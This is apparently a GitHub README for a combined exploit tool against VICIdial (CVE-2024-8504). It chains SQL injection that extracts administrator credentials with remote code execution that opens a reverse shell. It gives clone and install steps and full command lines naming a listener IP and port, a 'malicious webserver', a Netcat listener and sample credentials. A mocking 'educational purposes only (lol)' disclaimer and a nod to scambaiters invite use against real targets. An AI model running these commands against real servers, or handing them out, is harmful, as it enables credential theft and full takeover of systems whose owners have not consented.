This repository contains a combined exploit for two critical vulnerabilities discovered in VICIdial by KoreLogic:
These vulnerabilities allow an attacker to retrieve administrative credentials through SQLi and ultimately execute arbitrary code on the target server via an RCE attack.
This exploit tool allows you to either:
The tool is based on KoreLogic’s original research, with enhancements made to:
rich_click
.To use this exploit, you need:
requirements.txt
git clone https://github.com/Chocapikk/CVE-2024-8504
cd CVE-2024-8504
pip install -r requirements.txt
To perform only the SQL Injection attack and retrieve the administrative credentials, use the following command:
python exploit.py -u https://example.org
Once you have the administrator credentials, or if you already know them, you can launch a full RCE attack by running the following command:
python exploit.py -b -u https://example.org \
-wh <webserver IP> -wp <webserver port> \
-lh <your IP> -lp <your listener port> \
-un <admin username> -pw <admin password>
The -b
option binds the reverse shell to your listener IP and port. This command will start a Netcat listener on the specified port and wait for an incoming reverse shell.
⚠️ Replace
<webserver IP>
and<webserver port>
with the values of your malicious webserver (where you execute the exploit) used to capture the reverse shell or inject payloads.
It’s recommended to use a server where you can open ports to listen for reverse shells. Below are examples for both SQLi and RCE:
python exploit.py -u https://example.org
python exploit.py -u https://example.org -wh <server IP> -wp 5000 -lh <server IP> -lp 1337 -un admin -pw password123 -b
This exploit is based on the original work by KoreLogic, and full credit goes to them for the discovery and initial PoC:
Special thanks to KoreLogic for the foundational work. This tool was adapted to improve ease of use, bug fixes, and better separation between the two vulnerabilities.
This tool is for educational purposes only (lol). Use of this exploit without explicit permission from the system owner is illegal. The author assumes no responsibility for the misuse of this tool. Scambaiters, you're welcome.